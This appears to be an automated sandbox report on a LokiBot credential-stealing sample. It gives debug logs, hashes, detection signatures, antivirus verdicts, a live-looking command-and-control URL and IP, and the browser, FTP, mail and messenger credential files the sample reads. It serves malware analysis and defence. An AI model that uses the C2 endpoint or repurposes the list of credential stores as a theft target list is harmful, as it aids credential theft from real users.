2020-06-30 13:22:01,046 [root] DEBUG: DLL unloaded from 0x75880000.
2020-06-30 13:22:01,046 [root] DEBUG: DLL unloaded from 0x72070000.
2020-06-30 13:22:01,078 [root] DEBUG: DLL unloaded from 0x76450000.
2020-06-30 13:22:01,515 [root] DEBUG: DLL loaded at 0x73600000: C:\Windows\system32\vaultcli (0xc000 bytes).
2020-06-30 13:22:01,531 [root] DEBUG: DLL unloaded from 0x75D90000.
2020-06-30 13:22:02,015 [root] INFO: Announced starting service "b'VaultSvc'"
2020-06-30 13:22:02,015 [lib.api.process] INFO: Monitor config for process 460: C:\tmp52sk_on6\dll\460.ini
2020-06-30 13:22:02,046 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp52sk_on6\dll\MEySJo.dll, loader C:\tmp52sk_on6\bin\oLJOzVO.exe
2020-06-30 13:22:02,062 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\qFSspJcq.
2020-06-30 13:22:02,078 [root] DEBUG: Loader: Injecting process 460 (thread 0) with C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:22:02,078 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2888, handle 0xa0
2020-06-30 13:22:02,078 [root] DEBUG: Process image base: 0x009A0000
2020-06-30 13:22:02,078 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2020-06-30 13:22:02,093 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-06-30 13:22:02,109 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-06-30 13:22:02,125 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-30 13:22:02,125 [root] INFO: Disabling sleep skipping.
2020-06-30 13:22:02,125 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 460 at 0x6ae60000, image base 0x9a0000, stack from 0x1c86000-0x1c90000
2020-06-30 13:22:02,140 [root] DEBUG: Commandline: C:\Windows\System32\services.exe.
2020-06-30 13:22:02,156 [root] INFO: Loaded monitor into process with pid 460
2020-06-30 13:22:02,156 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2020-06-30 13:22:02,156 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2020-06-30 13:22:02,171 [root] DEBUG: Successfully injected DLL C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:22:03,187 [root] INFO: Announced 32-bit process name: lsass.exe pid: 2612
2020-06-30 13:22:03,187 [lib.api.process] INFO: Monitor config for process 2612: C:\tmp52sk_on6\dll\2612.ini
2020-06-30 13:22:03,203 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp52sk_on6\dll\MEySJo.dll, loader C:\tmp52sk_on6\bin\oLJOzVO.exe
2020-06-30 13:22:03,234 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\qFSspJcq.
2020-06-30 13:22:03,249 [root] DEBUG: Loader: Injecting process 2612 (thread 2368) with C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:22:03,249 [root] DEBUG: Process image base: 0x00DD0000
2020-06-30 13:22:03,249 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:22:03,249 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-30 13:22:03,249 [root] DEBUG: Successfully injected DLL C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:22:03,265 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2612
2020-06-30 13:22:03,281 [root] DEBUG: CreateProcessHandler: using lpCommandLine: C:\Windows\system32\lsass.exe.
2020-06-30 13:22:03,281 [root] DEBUG: CreateProcessHandler: Injection info set for new process 2612, ImageBase: 0x00DD0000
2020-06-30 13:22:03,281 [root] INFO: Announced 32-bit process name: lsass.exe pid: 2612
2020-06-30 13:22:03,281 [lib.api.process] INFO: Monitor config for process 2612: C:\tmp52sk_on6\dll\2612.ini
2020-06-30 13:22:03,281 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp52sk_on6\dll\MEySJo.dll, loader C:\tmp52sk_on6\bin\oLJOzVO.exe
2020-06-30 13:22:03,296 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\qFSspJcq.
2020-06-30 13:22:03,312 [root] DEBUG: Loader: Injecting process 2612 (thread 2368) with C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:22:03,312 [root] DEBUG: Process image base: 0x00DD0000
2020-06-30 13:22:03,328 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:22:03,343 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-30 13:22:03,359 [root] DEBUG: Successfully injected DLL C:\tmp52sk_on6\dll\MEySJo.dll.
2020-06-30 13:22:03,359 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2612
2020-06-30 13:22:03,359 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 2612.
2020-06-30 13:22:03,375 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-06-30 13:22:03,390 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-30 13:22:03,390 [root] INFO: Disabling sleep skipping.
2020-06-30 13:22:03,421 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-30 13:22:03,421 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 2612 at 0x6ae60000, image base 0xdd0000, stack from 0x216000-0x220000
2020-06-30 13:22:03,421 [root] DEBUG: Commandline: C:\Windows\System32\lsass.exe.
2020-06-30 13:22:03,437 [root] INFO: Loaded monitor into process with pid 2612
2020-06-30 13:22:33,375 [root] INFO: Process with pid 2612 has terminated
2020-06-30 13:22:33,406 [root] DEBUG: ResumeThreadHandler: CurrentInjectionInfo 0x0 (Pid 5540).
2020-06-30 13:22:33,796 [root] DEBUG: DLL loaded at 0x757A0000: C:\Windows\system32\profapi (0xb000 bytes).
2020-06-30 13:22:34,531 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x148 amd local view 0x742F0000 to global list.
2020-06-30 13:22:34,531 [root] DEBUG: DLL loaded at 0x736D0000: C:\Windows\system32\SAMCLI (0xf000 bytes).
2020-06-30 13:22:34,546 [root] DEBUG: DLL loaded at 0x73F10000: C:\Windows\system32\WKSCLI (0xf000 bytes).
2020-06-30 13:22:34,546 [root] DEBUG: DLL loaded at 0x742F0000: C:\Windows\system32\NETAPI32 (0x11000 bytes).
2020-06-30 13:22:34,578 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x73F20000 for section view with handle 0x148.
2020-06-30 13:22:34,578 [root] DEBUG: DLL loaded at 0x73F20000: C:\Windows\system32\netutils (0x9000 bytes).
2020-06-30 13:22:34,578 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x753A0000 for section view with handle 0x148.
2020-06-30 13:22:34,578 [root] DEBUG: DLL loaded at 0x753A0000: C:\Windows\system32\srvcli (0x19000 bytes).
2020-06-30 13:22:34,593 [root] DEBUG: DLL loaded at 0x742D0000: C:\Windows\system32\SAMLIB (0x12000 bytes).
2020-06-30 13:22:34,609 [root] DEBUG: DLL loaded at 0x74DD0000: C:\Windows\system32\USERENV (0x17000 bytes).
2020-06-30 13:22:34,703 [root] DEBUG: DLL loaded at 0x758D0000: C:\Windows\system32\CRYPT32 (0x122000 bytes).
2020-06-30 13:22:34,703 [root] DEBUG: DLL loaded at 0x75810000: C:\Windows\system32\MSASN1 (0xc000 bytes).
2020-06-30 13:22:34,718 [root] DEBUG: DLL loaded at 0x75180000: C:\Windows\System32\mswsock (0x3c000 bytes).
2020-06-30 13:22:34,734 [root] DEBUG: DLL loaded at 0x75040000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2020-06-30 13:22:34,734 [root] DEBUG: DLL loaded at 0x73C60000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2020-06-30 13:22:34,750 [root] DEBUG: DLL loaded at 0x73B10000: C:\Windows\system32\WINNSI (0x7000 bytes).
2020-06-30 13:22:35,406 [root] DEBUG: DLL loaded at 0x73A90000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2020-06-30 13:22:35,421 [root] DEBUG: DLL loaded at 0x71EA0000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2020-06-30 13:22:35,421 [root] DEBUG: DLL loaded at 0x75170000: C:\Windows\System32\wship6 (0x6000 bytes).
2020-06-30 13:22:35,421 [root] DEBUG: DLL loaded at 0x74D00000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2020-06-30 13:22:36,031 [root] INFO: Added new file to list with pid None and path C:\Users\Rebecca\AppData\Roaming\F569DD\D66C39.lck
2020-06-30 13:22:37,078 [root] INFO: Added new file to list with pid None and path C:\Users\Rebecca\AppData\Roaming\F569DD\D66C39.exe
2020-06-30 13:25:21,687 [root] INFO: Analysis timeout hit, terminating analysis.
2020-06-30 13:25:21,687 [lib.api.process] ERROR: Failed to open terminate event for pid 5848
2020-06-30 13:25:21,703 [root] INFO: Terminate event set for process 5848.
2020-06-30 13:25:21,781 [lib.api.process] INFO: Terminate event set for process 5540
2020-06-30 13:25:21,796 [root] DEBUG: Terminate Event: Attempting to dump process 5540
2020-06-30 13:25:26,781 [lib.api.process] INFO: Termination confirmed for process 5540
2020-06-30 13:25:26,781 [root] INFO: Terminate event set for process 5540.
2020-06-30 13:25:26,781 [lib.api.process] INFO: Terminate event set for process 460
2020-06-30 13:25:27,718 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x00400000.
2020-06-30 13:25:27,765 [root] DEBUG: Terminate Event: Attempting to dump process 460
2020-06-30 13:25:27,781 [lib.api.process] INFO: Termination confirmed for process 460
2020-06-30 13:25:27,781 [root] INFO: Terminate event set for process 460.
2020-06-30 13:25:27,781 [root] INFO: Created shutdown mutex.
2020-06-30 13:25:28,781 [root] INFO: Shutting down package.
2020-06-30 13:25:28,781 [root] INFO: Stopping auxiliary modules.
2020-06-30 13:25:37,968 [lib.common.results] WARNING: File C:\ZxMXpUba\bin\procmon.xml doesn't exist anymore
2020-06-30 13:25:37,968 [root] INFO: Finishing auxiliary modules.
2020-06-30 13:25:37,968 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-06-30 13:25:38,109 [root] WARNING: Folder at path "C:\ZxMXpUba\debugger" does not exist, skip.
2020-06-30 13:25:38,109 [root] INFO: Analysis completed.

Machine

Name Label Manager Started On Shutdown On
win7_3 win7_3 KVM 2020-06-30 13:28:44 2020-06-30 13:34:22

File Details

File Name file.exe
File Size 609792 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
PE timestamp 1992-06-19 22:22:17
MD5 fab404e9df64df68df97d11f691e177d
SHA1 bbfad4c8c65e980830a954301337dc5bfb45cf9e
SHA256 719f49f86929312a50e32c1f2513aa9b8ca1308fc667daeb1208ddae177aba75
SHA512 22fb633655e906f1e7948ff93b2905c0cf74811bc90cf19c03c0ab57b57bd2649cb1193e317e982b0a453681dbb2a8d83c3d18c7923c5e115dbe4eb47b034026
CRC32 ECFF98F9
Ssdeep 12288:QCbpcLhilrm7G8oclWEAroCo3DQmTADd69uOmVgpMb:XuLhi80Jro7eVcMb
Download Download ZIP Resubmit sample

Signatures

Behavioural detection: Executable code extraction - unpacking
Attempts to connect to a dead IP:Port (1 unique times)
IP: 103.129.98.18:80 (unknown)
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 5848 trigged the Yara rule 'shellcode_patterns'
Hit: PID 5848 trigged the Yara rule 'HeavensGate'
Hit: PID 5848 trigged the Yara rule 'Loki'
Creates RWX memory
Possible date expiration check, exits too soon after checking local time
process: file.exe, PID 5848
A process attempted to delay the analysis task.
Process: file.exe tried to sleep 420.27 seconds, actually delayed analysis time by 0.0 seconds
Dynamic (imported) function loading detected
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: kernel32.dll/GetDiskFreeSpaceExA
DynamicLoader: oleaut32.dll/VariantChangeTypeEx
DynamicLoader: oleaut32.dll/VarNeg
DynamicLoader: oleaut32.dll/VarNot
DynamicLoader: oleaut32.dll/VarAdd
DynamicLoader: oleaut32.dll/VarSub
DynamicLoader: oleaut32.dll/VarMul
DynamicLoader: oleaut32.dll/VarDiv
DynamicLoader: oleaut32.dll/VarIdiv
DynamicLoader: oleaut32.dll/VarMod
DynamicLoader: oleaut32.dll/VarAnd
DynamicLoader: oleaut32.dll/VarOr
DynamicLoader: oleaut32.dll/VarXor
DynamicLoader: oleaut32.dll/VarCmp
DynamicLoader: oleaut32.dll/VarI4FromStr
DynamicLoader: oleaut32.dll/VarR4FromStr
DynamicLoader: oleaut32.dll/VarR8FromStr
DynamicLoader: oleaut32.dll/VarDateFromStr
DynamicLoader: oleaut32.dll/VarCyFromStr
DynamicLoader: oleaut32.dll/VarBoolFromStr
DynamicLoader: oleaut32.dll/VarBstrFromCy
DynamicLoader: oleaut32.dll/VarBstrFromDate
DynamicLoader: oleaut32.dll/VarBstrFromBool
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/AnimateWindow
DynamicLoader: comctl32.dll/InitializeFlatSB
DynamicLoader: comctl32.dll/UninitializeFlatSB
DynamicLoader: comctl32.dll/FlatSB_GetScrollProp
DynamicLoader: comctl32.dll/FlatSB_SetScrollProp
DynamicLoader: comctl32.dll/FlatSB_EnableScrollBar
DynamicLoader: comctl32.dll/FlatSB_ShowScrollBar
DynamicLoader: comctl32.dll/FlatSB_GetScrollRange
DynamicLoader: comctl32.dll/FlatSB_GetScrollInfo
DynamicLoader: comctl32.dll/FlatSB_GetScrollPos
DynamicLoader: comctl32.dll/FlatSB_SetScrollPos
DynamicLoader: comctl32.dll/FlatSB_SetScrollInfo
DynamicLoader: comctl32.dll/FlatSB_SetScrollRange
DynamicLoader: USER32.dll/SetLayeredWindowAttributes
DynamicLoader: kernel32.dll/GetSystemTimeAsFileTime
DynamicLoader: kernel32.dll/FileTimeToSystemTime
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: nss3.dll/NSS_Init
DynamicLoader: nss3.dll/NSS_Shutdown
DynamicLoader: nss3.dll/PK11_GetInternalKeySlot
DynamicLoader: nss3.dll/PK11_FreeSlot
DynamicLoader: nss3.dll/PK11_Authenticate
DynamicLoader: nss3.dll/PK11SDR_Decrypt
DynamicLoader: nss3.dll/PK11_CheckUserPassword
DynamicLoader: nss3.dll/SECITEM_FreeItem
DynamicLoader: kernel32.dll/SetThreadDescription
DynamicLoader: kernel32.dll/InitializeCriticalSectionEx
DynamicLoader: softokn3.dll/NSC_GetFunctionList
DynamicLoader: softokn3.dll/NSC_ModuleDBFunc
DynamicLoader: softokn3.dll/NSC_GetFunctionList
DynamicLoader: freebl3.dll/FREEBL_GetVector
DynamicLoader: CRYPTBASE.dll/SystemFunction001
DynamicLoader: CRYPTBASE.dll/SystemFunction002
DynamicLoader: CRYPTBASE.dll/SystemFunction003
DynamicLoader: CRYPTBASE.dll/SystemFunction004
DynamicLoader: CRYPTBASE.dll/SystemFunction005
DynamicLoader: CRYPTBASE.dll/SystemFunction028
DynamicLoader: CRYPTBASE.dll/SystemFunction029
DynamicLoader: CRYPTBASE.dll/SystemFunction034
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: CRYPTBASE.dll/SystemFunction040
DynamicLoader: CRYPTBASE.dll/SystemFunction041
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: vaultcli.dll/VaultEnumerateItems
DynamicLoader: vaultcli.dll/VaultEnumerateVaults
DynamicLoader: vaultcli.dll/VaultFree
DynamicLoader: vaultcli.dll/VaultGetItem
DynamicLoader: vaultcli.dll/VaultOpenVault
DynamicLoader: vaultcli.dll/VaultCloseVault
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: NETAPI32.DLL/NetUserGetInfo
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptSetKeyParam
DynamicLoader: CRYPTSP.dll/CryptDecrypt
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: NETAPI32.DLL/NetUserGetInfo
DynamicLoader: NETAPI32.DLL/NetUserGetInfo
CAPE extracted potentially suspicious content
file.exe: Unpacked Shellcode
file.exe: Unpacked Shellcode
file.exe: Unpacked Shellcode
file.exe: Loki Payload: 32-bit executable
file.exe: Loki
HTTP traffic contains suspicious features which may be indicative of malware related traffic
post_no_referer: HTTP traffic contains a POST request with no referer header
http_version_old: HTTP traffic uses version 1.0
suspicious_request: http://airmanselectiontest.com/dest/Panel/fre.php
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1
Performs some HTTP requests
url: http://airmanselectiontest.com/dest/Panel/fre.php
The binary contains an unknown PE section name indicative of packing
unknown section: name: CODE, entropy: 6.53, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00056c00, virtual_size: 0x00056bb4
unknown section: name: DATA, entropy: 4.61, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x0000da00, virtual_size: 0x0000d8e4
unknown section: name: BSS, entropy: 0.00, characteristics: IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00000000, virtual_size: 0x00000e49
The binary likely contains encrypted or compressed data.
section: name: .rsrc, entropy: 7.13, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ, raw_size: 0x00027800, virtual_size: 0x00027658
Authenticode signature is invalid
authenticode error: No signature found. SignTool Error File not valid C\Users\Rebecca\AppData\Local\Temp\file.exe
Behavioural detection: Injection (Process Hollowing)
Injection: file.exe(5848) -> file.exe(5540)
Executed a process and injected code into it, probably while unpacking
Injection: file.exe(5848) -> file.exe(5540)
Deletes its original binary from disk
Behavioural detection: Injection (inter-process)
Attempts to repeatedly call a single API many times in order to delay analysis time
Spam: services.exe (460) called API GetSystemTimeAsFileTime 4645223 times
Steals private information from local Internet browsers
file: C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\pkcs11.txt
file: C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\cert9.db
file: C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\logins.json
file: C:\Users\Rebecca\AppData\Local\Google\Chrome\User Data\Default\Login Data
file: C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\key4.db
file: C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\profiles.ini
CAPE detected the Loki malware family
File has been identified by 39 Antiviruses on VirusTotal as malicious
Bkav: W32.AIDetectVM.malware2
MicroWorld-eScan: Gen:Variant.Zusy.307895
FireEye: Generic.mg.fab404e9df64df68
McAfee: Fareit-FTB!FAB404E9DF64
Cylance: Unsafe
K7GW: Trojan ( 00569c031 )
Cybereason: malicious.8c65e9
Arcabit: Trojan.Zusy.D4B2B7
F-Prot: W32/Injector.ABY.gen!Eldorado
Symantec: ML.Attribute.HighConfidence
APEX: Malicious
Paloalto: generic.ml
Kaspersky: HEUR:Trojan-Downloader.Win32.Adload.gen
BitDefender: Gen:Variant.Zusy.307895
Ad-Aware: Gen:Variant.Zusy.307895
Invincea: heuristic
Trapmine: malicious.moderate.ml.score
Emsisoft: Gen:Variant.Zusy.307895 (B)
SentinelOne: DFI - Malicious PE
Cyren: W32/Injector.ABY.gen!Eldorado
Fortinet: W32/Injector.ELXR!tr
Antiy-AVL: Trojan[PSW]/Win32.Chisburg
Endgame: malicious (high confidence)
Microsoft: Trojan:Win32/Wacatac.C!ml
ZoneAlarm: HEUR:Trojan-Downloader.Win32.Adload.gen
Cynet: Malicious (score: 100)
Acronis: suspicious
BitDefenderTheta: Gen:[email protected]
MAX: malware (ai score=87)
Malwarebytes: Trojan.MalPack.DLF
ESET-NOD32: a variant of Win32/Injector.EMNJ
Rising: Trojan.Injector!1.AFE3 (RDMK:cmRtazqMCGXDbHXtTyk9x2/bBoIh)
Ikarus: Trojan.Inject
MaxSecure: Trojan.Malware.300983.susgen
GData: Gen:Variant.Zusy.307895
Webroot: W32.Trojan.Gen
Panda: Trj/Genetic.gen
CrowdStrike: win/malicious_confidence_80% (D)
Qihoo-360: HEUR/QVM05.1.40EA.Malware.Gen
Creates a copy of itself
copy: C:\Users\Rebecca\AppData\Roaming\F569DD\D66C39.exe
Harvests credentials from local FTP client softwares
file: C:\Users\Rebecca\AppData\Roaming\FileZilla\sitemanager.xml
file: C:\Users\Rebecca\AppData\Roaming\FileZilla\recentservers.xml
file: C:\Users\Rebecca\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
file: C:\Users\Rebecca\AppData\Roaming\FTPGetter\servers.xml
file: C:\Program Files\FTPGetter\Profile\servers.xml
file: C:\Users\Rebecca\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
key: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
key: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
key: HKEY_CURRENT_USER\Software\Ghisler\Total Commander
key: HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
Harvests information related to installed instant messenger clients
file: C:\Users\Rebecca\AppData\Roaming\.purple\accounts.xml
Harvests information related to installed mail clients
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
key: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
key: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Collects information to fingerprint the system
Anomalous binary characteristics
anomaly: Timestamp on binary predates the release date of the OS version it requires by at least a year
Created network traffic indicative of malicious activity
signature: ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1
signature: ET JA3 Hash - Possible Malware - Various Malspam/RigEK
signature: ET MALWARE LokiBot Checkin
signature: ET MALWARE LokiBot User-Agent (Charon/Inferno)
signature: ET MALWARE LokiBot Fake 404 Response
signature: ET MALWARE LokiBot Request for C2 Commands Detected M2
signature: ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M2
signature: ET MALWARE LokiBot Request for C2 Commands Detected M1
Creates Lokibot mutexes
mutex: D4D5A6DF569DD66C39E6EB85

Screenshots


Hosts

Direct IP Country Name
N 103.129.98.18 [VT] unknown
Y 1.1.1.1 [VT] Australia

DNS

Name Response Post-Analysis Lookup
airmanselectiontest.com [VT] A 103.129.98.18 [VT] 103.129.98.18 [VT]

Summary

C:\Users\Rebecca\AppData\Local\Temp\file.ENU
C:\Users\Rebecca\AppData\Local\Temp\file.ENU.DLL
C:\Users\Rebecca\AppData\Local\Temp\file.EN
C:\Users\Rebecca\AppData\Local\Temp\file.EN.DLL
C:\Program Files\Mozilla Firefox\nss3.dll
C:\Users\Rebecca\AppData\Local\Temp\mozglue.dll
C:\Windows\System32\mozglue.dll
C:\Windows\system\mozglue.dll
C:\Windows\mozglue.dll
C:\Python27\mozglue.dll
C:\Python27\Scripts\mozglue.dll
C:\Windows\System32\wbem\mozglue.dll
C:\Windows\System32\WindowsPowerShell\v1.0\mozglue.dll
C:\ProgramData\chocolatey\bin\mozglue.dll
C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32\Scripts\mozglue.dll
C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32\mozglue.dll
C:\Users\Rebecca\AppData\Roaming\Python\Scripts\mozglue.dll
C:\Program Files\Mozilla Firefox\mozglue.dll
C:\Users\Rebecca\AppData\Local\Temp\VERSION.dll
C:\Windows\System32\version.dll
C:\Users\Rebecca\AppData\Local\Temp\dbghelp.dll
C:\Windows\System32\dbghelp.dll
C:\Users\Rebecca\AppData\Local\Temp\MSVCP140.dll
C:\Windows\System32\msvcp140.dll
C:\Users\Rebecca\AppData\Local\Temp\VCRUNTIME140.dll
C:\Windows\System32\VCRUNTIME140.dll
C:\Users\Rebecca\AppData\Local\Temp\api-ms-win-crt-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-runtime-l1-1-0.dll
C:\Users\Rebecca\AppData\Local\Temp\ucrtbase.DLL
C:\Windows\System32\ucrtbase.dll
C:\Users\Rebecca\AppData\Local\Temp\api-ms-win-core-timezone-l1-1-0.dll
C:\Windows\System32\api-ms-win-core-timezone-l1-1-0.dll
C:\Users\Rebecca\AppData\Local\Temp\api-ms-win-core-file-l2-1-0.dll
C:\Windows\System32\api-ms-win-core-file-l2-1-0.dll
C:\Users\Rebecca\AppData\Local\Temp\api-ms-win-core-localization-l1-2-0.dll
C:\Windows\System32\api-ms-win-core-localization-l1-2-0.dll
C:\Users\Rebecca\AppData\Local\Temp\api-ms-win-core-processthreads-l1-1-1.dll
C:\Windows\System32\api-ms-win-core-processthreads-l1-1-1.dll
C:\Users\Rebecca\AppData\Local\Temp\api-ms-win-core-file-l1-2-0.dll
C:\Windows\System32\api-ms-win-core-file-l1-2-0.dll
C:\Users\Rebecca\AppData\Local\Temp\api-ms-win-crt-string-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-string-l1-1-0.dll
C:\Users\Rebecca\AppData\Local\Temp\api-ms-win-crt-heap-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-heap-l1-1-0.dll
C:\Users\Rebecca\AppData\Local\Temp\api-ms-win-crt-stdio-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-stdio-l1-1-0.dll
C:\Users\Rebecca\AppData\Local\Temp\api-ms-win-crt-convert-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-convert-l1-1-0.dll
C:\Users\Rebecca\AppData\Local\Temp\api-ms-win-crt-locale-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-locale-l1-1-0.dll
C:\Users\Rebecca\AppData\Local\Temp\api-ms-win-crt-math-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-math-l1-1-0.dll
C:\Users\Rebecca\AppData\Local\Temp\api-ms-win-crt-multibyte-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-multibyte-l1-1-0.dll
C:\Users\Rebecca\AppData\Local\Temp\api-ms-win-crt-time-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-time-l1-1-0.dll
C:\Users\Rebecca\AppData\Local\Temp\api-ms-win-crt-filesystem-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-filesystem-l1-1-0.dll
C:\Users\Rebecca\AppData\Local\Temp\api-ms-win-crt-environment-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-environment-l1-1-0.dll
C:\Users\Rebecca\AppData\Local\Temp\api-ms-win-crt-utility-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-utility-l1-1-0.dll
C:\Users\Rebecca\AppData\Local\Temp\WINMM.dll
C:\Windows\System32\winmm.dll
C:\Users\Rebecca\AppData\Local\Temp\WSOCK32.dll
C:\Windows\System32\wsock32.dll
C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\profiles.ini
C:\Program Files\Mozilla Firefox\softokn3.dll
C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\pkcs11.txt
C:\Program Files\Mozilla Firefox\freebl3.dll
C:\Windows\System32\api-ms-win-core-sysinfo-l1-2-1.DLL
C:\
C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\cert9.db
C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\cert9.db-journal
C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\cert9.db-wal
C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\key4.db
C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\key4.db-journal
C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\key4.db-wal
C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\nssckbi.dll
C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\signons.sqlite
C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\logins.json
C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\signons.txt
